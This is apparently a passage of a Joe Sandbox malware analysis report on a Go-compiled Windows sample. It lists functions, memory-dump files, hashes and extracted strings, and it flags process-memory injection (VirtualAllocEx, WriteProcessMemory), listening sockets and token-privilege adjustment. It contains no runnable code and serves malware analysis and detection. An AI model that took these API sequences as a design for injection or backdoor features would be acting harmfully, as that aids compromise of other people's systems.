), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTIS, xrefs: 00826CAF, 00826E25
+./0:<=CLMPSZ[\]_hs{} + @ P [(") ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCS, xrefs: 00826D45, 00826EB7
args stack map entries for Aus Central W. Standard TimeCanada Central Standard TimeCen. Australia Standard TimeCentral Europe Standard TimeCertCreateCertificateContextFixedStack is not power-of-2GetFileInformationByHandleExPrepended_Concatenation_Mark[origina, xrefs: 00826C6F
untyped args -thread limitCertCloseStoreCreateProcessWCryptGenRandomFindFirstFileWFormatMessageWGC assist waitGC worker initGetConsoleModeGetProcAddressGetUserNameExWMB; allocated Module32FirstWNetUserGetInfoOther_ID_StartPattern_SyntaxProcess32NextWQuotatio, xrefs: 00826D26
and cnt= got= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930AdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicSTermTakriTamil] = (arrayclosedeferfalsefaultgcinggscanhchaninit int16int32int64mheapntohspanic, xrefs: 00826C51, 00826DC6
locals stack map entries for Central European Standard TimeCentral Standard Time (Mexico)E. South America Standard TimeEastern Standard Time (Mexico)GODEBUG: unknown cpu feature "Pacific Standard Time (Mexico)Turks And Caicos Standard Timeabi mismatch detecte, xrefs: 00826DE5

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID: (targetpc= , plugin: KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=) at entry+, elemsize=, npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateF$ and cnt= got= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930AdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicSTermTakriTamil] = (arrayclosedeferfalsefaultgcinggscanhchaninit int16int32int64mheapntohspanic$ args stack map entries for Aus Central W. Standard TimeCanada Central Standard TimeCen. Australia Standard TimeCentral Europe Standard TimeCertCreateCertificateContextFixedStack is not power-of-2GetFileInformationByHandleExPrepended_Concatenation_Mark[origina$ locals stack map entries for Central European Standard TimeCentral Standard Time (Mexico)E. South America Standard TimeEastern Standard Time (Mexico)GODEBUG: unknown cpu feature "Pacific Standard Time (Mexico)Turks And Caicos Standard Timeabi mismatch detecte$ untyped args -thread limitCertCloseStoreCreateProcessWCryptGenRandomFindFirstFileWFormatMessageWGC assist waitGC worker initGetConsoleModeGetProcAddressGetUserNameExWMB; allocated Module32FirstWNetUserGetInfoOther_ID_StartPattern_SyntaxProcess32NextWQuotatio$), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTIS$+./0:<=CLMPSZ[\]_hs{} + @ P [(") ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCS$bad symbol tablecastogscanstatusgc: unswept spangcshrinkstackoffinteger overflowinvalid argumentinvalid exchangeinvalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapno route to hostnon-Go functionobject is remotereflect mismatchremo$runtime: frame runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding psync.Mutex.Locktraceback stuck already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789abcdefCreateDirectoryWDnsNameCompar$runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown wait reasonwinmm.dll not found markroot jobs done to unallocated spanArabic Standard TimeAzores Sta
API String ID: 0-1606193872
Opcode ID: 9bd6ea260ea76a674850a8fee16e111f79c4a4b27dc1a635936a7a097380d8ee
Instruction ID: 6d27794cb7becb33034e7fecf51d179e4b2a36409ad1237939718db7990e87b5
Opcode Fuzzy Hash: 9bd6ea260ea76a674850a8fee16e111f79c4a4b27dc1a635936a7a097380d8ee
Instruction Fuzzy Hash: C2F1A576314B9486D720EF29F44079AB769FB89B80F549121EF8D83765EF38C594CB01

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA7329DC Relevance: 10.6, APIs: 7, Instructions: 98memoryinjectionCOMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32 ref: 0000017DEA732A2C
GetLastError.KERNEL32 ref: 0000017DEA732A3A
WriteProcessMemory.KERNEL32 ref: 0000017DEA732A7A
VirtualProtectEx.KERNEL32 ref: 0000017DEA732ACF
GetLastError.KERNEL32 ref: 0000017DEA732AD9
GetLastError.KERNEL32 ref: 0000017DEA732AE4
VirtualFree.KERNEL32 ref: 0000017DEA732B01

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: ErrorLastVirtual$AllocFreeMemoryProcessProtectWrite
String ID:
API String ID: 2897431253-0
Opcode ID: 9d639b9db9fe388e0ea0007647f992cc9d7a9c99bc439a06df16a1e995a1a836
Instruction ID: 1106c4a57728bbb60ff099eaa5bed7e2bdf9b38ec91f0431df4a5aa7c7c960fe
Opcode Fuzzy Hash: 9d639b9db9fe388e0ea0007647f992cc9d7a9c99bc439a06df16a1e995a1a836
Instruction Fuzzy Hash: 9D31C43130865A83EA27FF26B4547FA63B0BF94B94F1540349DCD4B795EE38C6098782

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA7350E0 Relevance: 9.1, APIs: 6, Instructions: 60networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0000017DEA72ED34: WSAStartup.WS2_32 ref: 0000017DEA72ED52

socket.WS2_32 ref: 0000017DEA735118
htons.WS2_32 ref: 0000017DEA735138
ioctlsocket.WS2_32 ref: 0000017DEA735154
closesocket.WS2_32 ref: 0000017DEA735162
bind.WS2_32 ref: 0000017DEA735175
listen.WS2_32 ref: 0000017DEA735185

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: Startupbindclosesockethtonsioctlsocketlistensocket
String ID:
API String ID: 1425508107-0
Opcode ID: e554addcf55df633650e010a70a130abdbe191ef44b404b2205d3ff1c75cc74b
Instruction ID: 93dbcc1eb89a21c93b838cd10f4f2c6985d8b9830c67e7528a4f5911039ad852
Opcode Fuzzy Hash: e554addcf55df633650e010a70a130abdbe191ef44b404b2205d3ff1c75cc74b
Instruction Fuzzy Hash: 4621D83121865A82E722EF02F8101A9A3B1FBC4FB0F550634DE9E0B794DF3CD6458702

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA734CD8 Relevance: 9.1, APIs: 6, Instructions: 57networkCOMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 0000017DEA734D00
htons.WS2_32 ref: 0000017DEA734D0C

Part of subcall function 0000017DEA72ED34: WSAStartup.WS2_32 ref: 0000017DEA72ED52

socket.WS2_32 ref: 0000017DEA734D24
closesocket.WS2_32 ref: 0000017DEA734D36
bind.WS2_32 ref: 0000017DEA734D63
ioctlsocket.WS2_32 ref: 0000017DEA734D7D

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: Startupbindclosesockethtonlhtonsioctlsocketsocket
String ID:
API String ID: 2462908977-0
Opcode ID: 1b0c989c961d88eb509ff974df06856b36856af28b3c2505fc1e9dad00bb82bf
Instruction ID: b65c5b84be4e14dd2fce5750784ad4c77692c6e1ee5fcf50d9fa3abf766ee91c
Opcode Fuzzy Hash: 1b0c989c961d88eb509ff974df06856b36856af28b3c2505fc1e9dad00bb82bf
Instruction Fuzzy Hash: D221A135214A4A82E726EB21F8143E97771FB88BB1F5146359E9D473D0DF3CC68AC601

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA732258 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64memoryinjectionCOMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000017DEA732296

Part of subcall function 0000017DEA73B228: _FF_MSGBANNER.LIBCMT ref: 0000017DEA73B258
Part of subcall function 0000017DEA73B228: _NMSG_WRITE.LIBCMT ref: 0000017DEA73B262
Part of subcall function 0000017DEA73B228: HeapAlloc.KERNEL32 ref: 0000017DEA73B27D
Part of subcall function 0000017DEA73B228: _callnewh.LIBCMT ref: 0000017DEA73B296
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2A1
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2AC

VirtualAllocEx.KERNEL32 ref: 0000017DEA7322E1
WriteProcessMemory.KERNEL32 ref: 0000017DEA732305
free.LIBCMT ref: 0000017DEA73231B

Strings

@, xrefs: 0000017DEA7322D9

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: Alloc_errno$HeapMemoryProcessVirtualWrite_callnewhfreemalloc
String ID: @
API String ID: 1963606803-2766056989
Opcode ID: 0c55abef161af94e8cd7f16b8447d1cf9a29d0a2536f4fd58ba8b88f039371dc
Instruction ID: 7e443df90f4da7c86ddd4f32c4bad395db561b26260e5329c743c2c564bea8b3
Opcode Fuzzy Hash: 0c55abef161af94e8cd7f16b8447d1cf9a29d0a2536f4fd58ba8b88f039371dc
Instruction Fuzzy Hash: 6D213972308B4586EA12EF12F8405AABBB4FBC8B90F5645259F8D87B21DF3CC245C745

Uniqueness

Uniqueness Score: -1.00%

Function 007EB120 Relevance: 8.0, Strings: 6, Instructions: 517COMMON

Download Yara Rule

Strings

delayed zeroing on data that may contain pointersfully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characterpanicwrap: unexpected string after package name: runtime: unexpe, xrefs: 007EB8B7
mallocgc called with gcphase == _GCmarkterminationrecursive call during initialization - linker skewruntime: unable to acquire - semaphore out of syncfatal: systemstack called from unexpected goroutinelimiterEvent.stop: invalid limiter event type foundpotentia, xrefs: 007EB936
!"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC, xrefs: 007EB47A
malloc during signalnotetsleep not on g0p mcache not flushedpacer: assist ratio=preempt off reason: reflect.makeFuncStubsemaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found, xrefs: 007EB910
malloc deadlockmisaligned maskmissing mcache?ms: gomaxprocs=network is downno medium foundno such processpreempt SPWRITErecovery failedruntime error: runtime: frame runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding psync., xrefs: 007EB925
mallocgc called without a P or outside bootstrappingruntime.SetFinalizer: pointer not in allocated blockruntime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in reset, xrefs: 007EB8FF

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID: !"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC$delayed zeroing on data that may contain pointersfully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characterpanicwrap: unexpected string after package name: runtime: unexpe$malloc deadlockmisaligned maskmissing mcache?ms: gomaxprocs=network is downno medium foundno such processpreempt SPWRITErecovery failedruntime error: runtime: frame runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding psync.$malloc during signalnotetsleep not on g0p mcache not flushedpacer: assist ratio=preempt off reason: reflect.makeFuncStubsemaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found$mallocgc called with gcphase == _GCmarkterminationrecursive call during initialization - linker skewruntime: unable to acquire - semaphore out of syncfatal: systemstack called from unexpected goroutinelimiterEvent.stop: invalid limiter event type foundpotentia$mallocgc called without a P or outside bootstrappingruntime.SetFinalizer: pointer not in allocated blockruntime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in reset
API String ID: 0-1088439770
Opcode ID: 019dddc2cdaa6aee403b3b9d9dbddcd7cc6430605fb8234c8d4dea9aa1bfaf12
Instruction ID: 7726aefed0a06951f5dd07144b0eb5d893d6dd3e0b30c5e5f438973321212a80
Opcode Fuzzy Hash: 019dddc2cdaa6aee403b3b9d9dbddcd7cc6430605fb8234c8d4dea9aa1bfaf12
Instruction Fuzzy Hash: 9B22AE7261ABD4C2DB10CB56E0407ABAB65F789BD4F485126EF9D07BA5CB3CC984CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA72F5C8 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000017DEA72F5E9

Part of subcall function 0000017DEA72ED34: WSAStartup.WS2_32 ref: 0000017DEA72ED52

Sleep.KERNEL32 ref: 0000017DEA72F658
GetTickCount.KERNEL32 ref: 0000017DEA72F65E
Sleep.KERNEL32 ref: 0000017DEA72F677
closesocket.WS2_32 ref: 0000017DEA72F680

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: CountSleepTick$Startupclosesocket
String ID:
API String ID: 2132357648-0
Opcode ID: 588ff6f82283d4a7c805e44e29e2c84cb311402872418522d6f8f0303ab7943a
Instruction ID: 50002eeb50a6bbd2c2e27230ca24d5b5a8d12ef2f66440618af1fe7afd3bd50d
Opcode Fuzzy Hash: 588ff6f82283d4a7c805e44e29e2c84cb311402872418522d6f8f0303ab7943a
Instruction Fuzzy Hash: A121A431208A4A42EA12F762B4541E962B1FBC5BF0F440734DAED4B7E6DE38C7458702

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA73AF84 Relevance: 7.6, APIs: 5, Instructions: 53networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000017DEA72ED34: WSAStartup.WS2_32 ref: 0000017DEA72ED52

socket.WS2_32 ref: 0000017DEA73AFB9
closesocket.WS2_32 ref: 0000017DEA73AFCB
htons.WS2_32 ref: 0000017DEA73AFDC
bind.WS2_32 ref: 0000017DEA73AFFD
listen.WS2_32 ref: 0000017DEA73B012

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: Startupbindclosesockethtonslistensocket
String ID:
API String ID: 3426924835-0
Opcode ID: d3424f860b44bdc497b67123c53142fb4163d3a29e4eaf258a4c9ddadf87f0ed
Instruction ID: ee82e31c86283f6c5890688716ab958743bf5edf4b87b87e52744750c27f819c
Opcode Fuzzy Hash: d3424f860b44bdc497b67123c53142fb4163d3a29e4eaf258a4c9ddadf87f0ed
Instruction Fuzzy Hash: 1811D53520865A82E612FF52B8052A9B770FBC4BE0F544635EAED0BBD4DF3DC2098706

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA72FE24 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

LookupPrivilegeValueA.ADVAPI32 ref: 0000017DEA72FE9E
AdjustTokenPrivileges.ADVAPI32 ref: 0000017DEA72FECE
GetLastError.KERNEL32 ref: 0000017DEA72FED8

Strings

%s, xrefs: 0000017DEA72FEE6

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID: %s
API String ID: 4244140340-620797490
Opcode ID: 2c6d198ceb926170827977084efa5a65a39764af245ea770d1fcf8d01094e782
Instruction ID: 4ec9d523ab8d77183e52254c7b66a18fa9e385cb8ebfd151baec648dd0f2cfb8
Opcode Fuzzy Hash: 2c6d198ceb926170827977084efa5a65a39764af245ea770d1fcf8d01094e782
Instruction Fuzzy Hash: 4C219E72B04B4A89F711EF65E4047EC33B5AB94B88F9448258E8C9BB89EF34C215C381

Uniqueness

Uniqueness Score: -1.00%

Function 007E4F60 Relevance: 6.7, Strings: 5, Instructions: 418COMMON

Download Yara Rule

Strings

8O~, xrefs: 007E561B
unreachableuserenv.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= maxTrigger= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<, xrefs: 007E5110
8O~, xrefs: 007E4F60
G waiting list is corruptedaddress not a stack addresschannel number out of rangecommunication error on sendcould not find QPC syscallsfailed to set sweep barriergcstopm: not waiting for gcgrowslice: len out of rangeinternal lockOSThread errorinvalid profile b, xrefs: 007E54C4
`X~, xrefs: 007E53DD

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID: 8O~$8O~$G waiting list is corruptedaddress not a stack addresschannel number out of rangecommunication error on sendcould not find QPC syscallsfailed to set sweep barriergcstopm: not waiting for gcgrowslice: len out of rangeinternal lockOSThread errorinvalid profile b$`X~$unreachableuserenv.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= maxTrigger= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<
API String ID: 0-3346403283
Opcode ID: 4ff46b123a8ffa1d0e3634f72ed6f559b5d1fe985f8f21bd5cd623a046379db0
Instruction ID: c5bf9621496795d57021992702297b0a1dd463d1818aef78577524ac2e74a311
Opcode Fuzzy Hash: 4ff46b123a8ffa1d0e3634f72ed6f559b5d1fe985f8f21bd5cd623a046379db0
Instruction Fuzzy Hash: 0802CD72205FC8C6DB24DB2AE44039AA7A1F789BC4F989025DB8C97B5ACF7DC444C741

Uniqueness

Uniqueness Score: -1.00%

Function 008120C0 Relevance: 6.5, Strings: 5, Instructions: 297COMMON

Download Yara Rule

Strings

, gp->atomicstatus=Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseContextEgypt Standard TimeGC mark terminationGC work not flushedGetCurrentProcessIdGetSystemDirectoryWGetTokenInformationHaiti Standar, xrefs: 00812525
, goid=, j0 = : type AvestanBengaliBrailleCopySidCypriotDeseretElbasanElymaicGODEBUGGranthaHanunooIO waitKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaRadicalSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaUNKNOWNWSARecvWSASendtypes value=c, xrefs: 00812505, 0081258F
invalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapno route to hostnon-Go functionobject is remotereflect mismatchremote I/O errorruntime: addr = runtime: base = runtime: head = runtime: nelems=schedule: in cgotime: bad [0-9]*work, xrefs: 008125DA
suspendG from non-preemptible goroutinetraceback: unexpected SPWRITE function transport endpoint is already connectedaddress family not supported by protocolbulkBarrierPreWrite: unaligned argumentscannot free workbufs when work.full != 0failed to acquire lock , xrefs: 008125EB
